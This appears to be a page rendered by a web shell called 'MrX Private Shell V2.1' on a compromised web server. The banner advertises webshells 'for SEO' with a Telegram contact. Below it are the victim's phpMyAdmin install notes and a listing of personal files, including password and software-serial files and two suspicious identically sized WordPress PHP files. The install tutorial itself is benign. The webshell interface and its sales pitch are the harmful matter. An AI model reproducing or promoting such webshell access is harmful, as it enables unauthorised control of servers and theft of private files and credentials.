__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
18 Install PHPMyAdmin Database Administration Tool Since Debian 10, PHPMyAdmin is not available as .deb package anymore. Therefore we will install it from source. Create folders for PHPMyadmin: mkdir /usr/share/phpmyadmin mkdir /etc/phpmyadmin mkdir -p /var/lib/phpmyadmin/tmp chown -R www-data:www-data /var/lib/phpmyadmin touch /etc/phpmyadmin/htpasswd.setup Go to the /tmp directory and download the PHPMyAdmin sources: cd /tmp wget https://files.phpmyadmin.net/phpMyAdmin/4.9.0.1/phpMyAdmin-4.9.0.1-all-languages.tar.gz Unpack the downloaded archive file and move the files to the /usr/share/phpmyadmin folder and clean up the /tmp directory. tar xfz phpMyAdmin-4.9.0.1-all-languages.tar.gz mv phpMyAdmin-4.9.0.1-all-languages/* /usr/share/phpmyadmin/ rm phpMyAdmin-4.9.0.1-all-languages.tar.gz rm -rf phpMyAdmin-4.9.0.1-all-languages Create a new config file for PHPMyaAdmin based on the provided sample file: cp /usr/share/phpmyadmin/config.sample.inc.php /usr/share/phpmyadmin/config.inc.php Open the config file with nano editor: nano /usr/share/phpmyadmin/config.inc.php Set a secure password (blowfish secret) which must be 32 chars long: $cfg['blowfish_secret'] = '4c3767c4a9123ef50eb6c6f3407124aa'; /* YOU MUST FILL IN THIS FOR COOKIE AUTH! */ Don't use my example blowfish secret, set your own one! Then add a line to set the directory which PHPMyAdmin shall use to store temporary files: $cfg['TempDir'] = '/var/lib/phpmyadmin/tmp'; Next, we create the Apache configuration file for PHPMyAdmin by opening a new file in nano editor: nano /etc/apache2/conf-available/phpmyadmin.conf Paste the following config into the file and save it. # phpMyAdmin default Apache configuration Alias /phpmyadmin /usr/share/phpmyadmin <Directory /usr/share/phpmyadmin> Options FollowSymLinks DirectoryIndex index.php <IfModule mod_php7.c> AddType application/x-httpd-php .php php_flag magic_quotes_gpc Off php_flag track_vars On php_flag register_globals Off php_value include_path . </IfModule> </Directory> # Authorize for setup <Directory /usr/share/phpmyadmin/setup> <IfModule mod_authn_file.c> AuthType Basic AuthName "phpMyAdmin Setup" AuthUserFile /etc/phpmyadmin/htpasswd.setup </IfModule> Require valid-user </Directory> # Disallow web access to directories that don't need it <Directory /usr/share/phpmyadmin/libraries> Order Deny,Allow Deny from All </Directory> <Directory /usr/share/phpmyadmin/setup/lib> Order Deny,Allow Deny from All </Directory> Activate the configuration and restart Apache. a2enconf phpmyadmin systemctl restart apache2 In the next step, we will configure the phpMyadmin configuration store (database). Log into MariaDB as root user: mysql -u root -p In the MariaDB shell, create a new database for PHPMyAdmin: MariaDB [(none)]> CREATE DATABASE phpmyadmin; Then create a new user: MariaDB [(none)]> CREATE USER 'pma'@'localhost' IDENTIFIED BY 'mypassword'; Replace the word mypassword with a secure password of your choice in the commands above and below, use the same password both times. Then grant the user access to this database and reload database permissions. MariaDB [(none)]> GRANT ALL PRIVILEGES ON phpmyadmin.* TO 'pma'@'localhost' IDENTIFIED BY 'mypassword' WITH GRANT OPTION; MariaDB [(none)]> FLUSH PRIVILEGES; MariaDB [(none)]> EXIT; Finally, load the SQL tables into the database: mysql -u root -p phpmyadmin < /usr/share/phpmyadmin/sql/create_tables.sql Enter the MariaDB root password on request. All we have to do now is to set the phpmyadmin user details in the configuration file. Open the file in nano editor again: nano /usr/share/phpmyadmin/config.inc.php Scroll down until you see the lines below and edit them: /* User used to manipulate with storage */ $cfg['Servers'][$i]['controlhost'] = 'localhost'; $cfg['Servers'][$i]['controlport'] = ''; $cfg['Servers'][$i]['controluser'] = 'pma'; $cfg['Servers'][$i]['controlpass'] = 'mypassword'; /* Storage database and tables */ $cfg['Servers'][$i]['pmadb'] = 'phpmyadmin'; $cfg['Servers'][$i]['bookmarktable'] = 'pma__bookmark'; $cfg['Servers'][$i]['relation'] = 'pma__relation'; $cfg['Servers'][$i]['table_info'] = 'pma__table_info'; $cfg['Servers'][$i]['table_coords'] = 'pma__table_coords'; $cfg['Servers'][$i]['pdf_pages'] = 'pma__pdf_pages'; $cfg['Servers'][$i]['column_info'] = 'pma__column_info'; $cfg['Servers'][$i]['history'] = 'pma__history'; $cfg['Servers'][$i]['table_uiprefs'] = 'pma__table_uiprefs'; $cfg['Servers'][$i]['tracking'] = 'pma__tracking'; $cfg['Servers'][$i]['userconfig'] = 'pma__userconfig'; $cfg['Servers'][$i]['recent'] = 'pma__recent'; $cfg['Servers'][$i]['favorite'] = 'pma__favorite'; $cfg['Servers'][$i]['users'] = 'pma__users'; $cfg['Servers'][$i]['usergroups'] = 'pma__usergroups'; $cfg['Servers'][$i]['navigationhiding'] = 'pma__navigationhiding'; $cfg['Servers'][$i]['savedsearches'] = 'pma__savedsearches'; $cfg['Servers'][$i]['central_columns'] = 'pma__central_columns'; $cfg['Servers'][$i]['designer_settings'] = 'pma__designer_settings'; $cfg['Servers'][$i]['export_templates'] = 'pma__export_templates'; I've marked the lines in red which I've edited. Replace mypassword with the password that you've chosen for the phpmyadmin user. Note that the // in front of the lines have been removed as well!
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .trash7206 | Folder | 0755 |
|
|
| docs | Folder | 0755 |
|
|
| .htaccess | File | 197 B | 0644 |
|
| 119898102-1.pdf | File | 426.48 KB | 0644 |
|
| 119898102.pdf | File | 426.48 KB | 0644 |
|
| 20210517_Mi_Dash_Cam_1S_Manual-1.pdf | File | 400.17 KB | 0644 |
|
| 20210517_Mi_Dash_Cam_1S_Manual.pdf | File | 400.17 KB | 0644 |
|
| CT_COTEL_2014_2_03.pdf | File | 570.29 KB | 0644 |
|
| Carta.pdf | File | 248.76 KB | 0644 |
|
| Manual-Servidor-Debian.pdf | File | 807.84 KB | 0644 |
|
| Tidd_e_Bessant.pdf | File | 4.74 MB | 0644 |
|
| a2enmod_a2enconf.txt | File | 204 B | 0644 |
|
| aleixandre.html | File | 1.79 KB | 0644 |
|
| aleixandre.txt | File | 1.36 KB | 0644 |
|
| alterar_sql.txt | File | 544 B | 0644 |
|
| apache-ddns.txt | File | 329 B | 0644 |
|
| apache-ssl.txt | File | 1.23 KB | 0644 |
|
| apache.txt | File | 5.05 KB | 0644 |
|
| apagar-disco.txt | File | 481 B | 0644 |
|
| atualizar_um_pacote.txt | File | 38 B | 0644 |
|
| banco.txt | File | 59 B | 0644 |
|
| bind-caduceu-uh.txt | File | 2.91 KB | 0644 |
|
| biostar-3060.pdf | File | 1.51 MB | 0644 |
|
| biostart_J3060-1.pdf | File | 1.51 MB | 0644 |
|
| biostart_J3060.pdf | File | 1.51 MB | 0644 |
|
| bug_libssl1_1_amd64.txt | File | 138 B | 0644 |
|
| cef_modseg.txt | File | 238 B | 0644 |
|
| cert-ssl.txt | File | 165 B | 0644 |
|
| certbot.txt | File | 47 B | 0644 |
|
| cff_cartilagem_de_tubarao__.pdf | File | 121.67 KB | 0644 |
|
| chromebook-ad1br.txt | File | 21 B | 0644 |
|
| citadel.txt | File | 2.77 KB | 0644 |
|
| comandos_mysql.txt | File | 3.45 KB | 0644 |
|
| coment_prost_inf.txt | File | 608 B | 0644 |
|
| config-ssh.txt | File | 3.22 KB | 0644 |
|
| converter-sem-audio.txt | File | 137 B | 0644 |
|
| converter.txt | File | 203 B | 0644 |
|
| cor_destaque_fonte.txt | File | 90 B | 0644 |
|
| corrigir-particao.txt | File | 533 B | 0644 |
|
| corrigir.txt | File | 171 B | 0644 |
|
| cups-admin.txt | File | 27 B | 0644 |
|
| dash.txt | File | 28 B | 0644 |
|
| data_wordpress.txt | File | 16 B | 0644 |
|
| dengue_aspecto_epidemiologicos_diagnostico_tratamento.pdf | File | 247.65 KB | 0644 |
|
| dep_kdenlive.txt | File | 41 B | 0644 |
|
| depuracao_usb.txt | File | 329 B | 0644 |
|
| desinstalar_nautilus.txt | File | 41 B | 0644 |
|
| dez_diretivas-bolsanello-1982.pdf | File | 1.17 MB | 0644 |
|
| dhcpc-rpi.txt | File | 440 B | 0644 |
|
| dicas.txt | File | 33.84 KB | 0644 |
|
| dir_mysql.txt | File | 15 B | 0644 |
|
| dkpg-confgure.txt | File | 229 B | 0644 |
|
| dns-caduceu.txt | File | 3.56 KB | 0644 |
|
| dns-com-uolhost.txt | File | 3.45 KB | 0644 |
|
| dns-ipv6.txt | File | 1.53 KB | 0644 |
|
| dns-ns1-com-uol.txt | File | 7.03 KB | 0644 |
|
| dns-ns1.txt | File | 6.89 KB | 0644 |
|
| dns-ns2.txt | File | 3.57 KB | 0644 |
|
| dns-rpi-puro.txt | File | 6.88 KB | 0644 |
|
| dns-rpi.txt | File | 6.95 KB | 0644 |
|
| dvr_787hd.pdf | File | 1.32 MB | 0644 |
|
| dwr920v-1.pdf | File | 5.31 MB | 0644 |
|
| dwr920v.pdf | File | 5.31 MB | 0644 |
|
| email-adv-mauro.txt | File | 86 B | 0644 |
|
| encaminhamentos.txt | File | 424 B | 0644 |
|
| extrair-mbr.txt | File | 78 B | 0644 |
|
| ffmpeg-cortar.txt | File | 74 B | 0644 |
|
| ffmpeg-trasicao.txt | File | 394 B | 0644 |
|
| ffmpeg.txt | File | 3.56 KB | 0644 |
|
| ftp.txt | File | 418 B | 0644 |
|
| gerar_senha_aleatoria.txt | File | 48 B | 0644 |
|
| gif-mp4.txt | File | 429 B | 0644 |
|
| gnome-classic.txt | File | 94 B | 0644 |
|
| grpr-ipva-2023.pdf | File | 59.11 KB | 0644 |
|
| gsmartcontrol.txt | File | 73 B | 0644 |
|
| home_zp.txt | File | 458 B | 0644 |
|
| hostgator.txt | File | 50 B | 0644 |
|
| iframe-docs.txt | File | 217 B | 0644 |
|
| iframe-noticias.txt | File | 132 B | 0644 |
|
| iframe.txt | File | 116 B | 0644 |
|
| ifup.txt | File | 51 B | 0644 |
|
| img-pop.txt | File | 230 B | 0644 |
|
| img-popup.txt | File | 579 B | 0644 |
|
| impressora-debian.txt | File | 147 B | 0644 |
|
| impressora.txt | File | 153 B | 0644 |
|
| index.html | File | 279 B | 0644 |
|
| inserir-dropbox.txt | File | 215 B | 0644 |
|
| inserir-html.txt | File | 224 B | 0644 |
|
| inserir-moodle.txt | File | 162 B | 0644 |
|
| inserir-mp4.txt | File | 223 B | 0644 |
|
| inserir-musicais.txt | File | 243 B | 0644 |
|
| inserir-psc.txt | File | 246 B | 0644 |
|
| inserir-videos.txt | File | 243 B | 0644 |
|
| inserir-x.txt | File | 214 B | 0644 |
|
| inserir-youtube.txt | File | 123 B | 0644 |
|
| inserir-yt.txt | File | 231 B | 0644 |
|
| inserir.txt | File | 3.35 KB | 0644 |
|
| inserir2.txt | File | 2.91 KB | 0644 |
|
| inserir_video_com.txt | File | 246 B | 0644 |
|
| instalar-uolhost.txt | File | 4.02 KB | 0644 |
|
| install_ns1.txt | File | 1.4 KB | 0644 |
|
| interfaces-rpi.txt | File | 425 B | 0644 |
|
| interfaces2.txt | File | 240 B | 0644 |
|
| ip_fixo-gvt.txt | File | 690 B | 0644 |
|
| ip_wordpress.txt | File | 98 B | 0644 |
|
| ipv6-rpi-3b.txt | File | 38 B | 0644 |
|
| ipv6-vb-srv.txt | File | 223 B | 0644 |
|
| ipv6-vbox-midia.txt | File | 40 B | 0644 |
|
| ipv6.txt | File | 162 B | 0644 |
|
| ipva.txt | File | 80 B | 0644 |
|
| kill.txt | File | 97 B | 0644 |
|
| largura_imagens.txt | File | 11 B | 0644 |
|
| lcd-rpi.txt | File | 605 B | 0644 |
|
| limpa_ram.txt | File | 74 B | 0644 |
|
| limpar_cache.txt | File | 98 B | 0644 |
|
| links_absurdos_lulistas.txt | File | 6.67 KB | 0644 |
|
| lista-compactados-zp.txt | File | 86.47 KB | 0644 |
|
| lista.txt | File | 131 B | 0644 |
|
| mate.txt | File | 173 B | 0644 |
|
| menu-psc.txt | File | 1.45 KB | 0644 |
|
| mesclar-audio-video.txt | File | 82 B | 0644 |
|
| mesclar-mijia.txt | File | 60 B | 0644 |
|
| mesclar.txt | File | 150 B | 0644 |
|
| mkfs.txt | File | 19 B | 0644 |
|
| moodle.txt | File | 129 B | 0644 |
|
| mt.txt | File | 1.4 KB | 0644 |
|
| musicais.txt | File | 1021 B | 0644 |
|
| my-2018_181-5b1-gol-66-1.pdf | File | 3.8 MB | 0644 |
|
| my-2018_181-5b1-gol-66.pdf | File | 3.8 MB | 0644 |
|
| mysql-ddns.txt | File | 708 B | 0644 |
|
| mysql-opatriota.txt | File | 382 B | 0644 |
|
| mysql.txt | File | 424 B | 0644 |
|
| nasa.txt | File | 766 B | 0644 |
|
| nfe-chromebook-3.pdf | File | 31.81 KB | 0644 |
|
| nfe-rpi-3b-1.pdf | File | 31.29 KB | 0644 |
|
| nfe-rpi-3b.pdf | File | 31.29 KB | 0644 |
|
| noip.txt | File | 1.88 KB | 0644 |
|
| nslookup.txt | File | 25 B | 0644 |
|
| ntp.txt | File | 1.15 KB | 0644 |
|
| pacotes.txt | File | 699 B | 0644 |
|
| paragrafos.txt | File | 38 B | 0644 |
|
| path.txt | File | 248 B | 0644 |
|
| php_ini.txt | File | 173 B | 0644 |
|
| phpmyadmin.txt | File | 5.19 KB | 0644 |
|
| plat-brasil.txt | File | 63 B | 0644 |
|
| pop-mae.txt | File | 55 B | 0644 |
|
| portas_servidor.txt | File | 1.33 KB | 0644 |
|
| pular_ssl.txt | File | 1010 B | 0644 |
|
| pureftpd.txt | File | 164 B | 0644 |
|
| pw_ddns.txt | File | 12 B | 0644 |
|
| pw_reaa.txt | File | 23 B | 0644 |
|
| rc-local-rpi.txt | File | 437 B | 0644 |
|
| reconf_phpmyadmin.txt | File | 514 B | 0644 |
|
| reconfigure-dash.txt | File | 28 B | 0644 |
|
| remover_trava_ssh.txt | File | 80 B | 0644 |
|
| restauracao-mbr.txt | File | 348 B | 0644 |
|
| restaurar-img.txt | File | 331 B | 0644 |
|
| rm_dropbox-cache.txt | File | 80 B | 0644 |
|
| rm_exif.txt | File | 212 B | 0644 |
|
| rm_metadata.txt | File | 169 B | 0644 |
|
| rm_temas.txt | File | 246 B | 0644 |
|
| rotulos_que_marcam.pdf | File | 159.23 KB | 0644 |
|
| rpi-ssl.txt | File | 1018 B | 0644 |
|
| rpi-temp.txt | File | 42 B | 0644 |
|
| rpiconfserver-ddns.txt | File | 9.74 KB | 0644 |
|
| rpiconfserver.txt | File | 12.21 KB | 0644 |
|
| saida-mbr.txt | File | 88 B | 0644 |
|
| saida.txt | File | 82 B | 0644 |
|
| script-rc_local-noip.txt | File | 346 B | 0644 |
|
| selene.txt | File | 25 B | 0644 |
|
| serial-dwcs3.txt | File | 174 B | 0644 |
|
| serial-easy-recovery.txt | File | 30 B | 0644 |
|
| serial-win8pro.txt | File | 30 B | 0644 |
|
| servidor-caduceu-uolhost.txt | File | 4.14 KB | 0644 |
|
| servidor-ddns-debian10.txt | File | 8.41 KB | 0644 |
|
| servidor-ddns-ubuntu20.txt | File | 5.38 KB | 0644 |
|
| servidor-ns1-uolhost.txt | File | 4.13 KB | 0644 |
|
| servidor-ns2-uolhost.txt | File | 5.24 KB | 0644 |
|
| smb-i.txt | File | 140 B | 0644 |
|
| smb.txt | File | 687 B | 0644 |
|
| socialismo.txt | File | 622 B | 0644 |
|
| speedtest.txt | File | 44 B | 0644 |
|
| sql.txt | File | 162 B | 0644 |
|
| sql_home_zp.txt | File | 126 B | 0644 |
|
| sudo.txt | File | 219 B | 0644 |
|
| temp.txt | File | 65 B | 0644 |
|
| tor_rpi.txt | File | 233 B | 0644 |
|
| trim.txt | File | 1.52 KB | 0644 |
|
| tutorial_endnote_web.pdf | File | 7 MB | 0644 |
|
| upg_wp.txt | File | 819 B | 0644 |
|
| uuid.txt | File | 112 B | 0644 |
|
| vacina_spike.pdf | File | 909.13 KB | 0644 |
|
| vbox-instalar.txt | File | 183 B | 0644 |
|
| vi.txt | File | 172 B | 0644 |
|
| video-mp4-nvu.txt | File | 218 B | 0644 |
|
| video-mp4.txt | File | 179 B | 0644 |
|
| video-webm-nvu.txt | File | 220 B | 0644 |
|
| video-webm.txt | File | 183 B | 0644 |
|
| video.txt | File | 228 B | 0644 |
|
| vmware.txt | File | 34 B | 0644 |
|
| vsftp.txt | File | 414 B | 0644 |
|
| webalizer.txt | File | 268 B | 0644 |
|
| wget.txt | File | 522 B | 0644 |
|
| width.txt | File | 12 B | 0644 |
|
| wine.txt | File | 120 B | 0644 |
|
| wordpress.txt | File | 1.11 KB | 0644 |
|
| wp-atualizacoes.txt | File | 244 B | 0644 |
|
| wp-blog-header.php | File | 2.73 KB | 0644 |
|
| wp-cron.php | File | 2.73 KB | 0644 |
|
| xorg.txt | File | 975 B | 0644 |
|
| youtube-dl.txt | File | 2.13 KB | 0644 |
|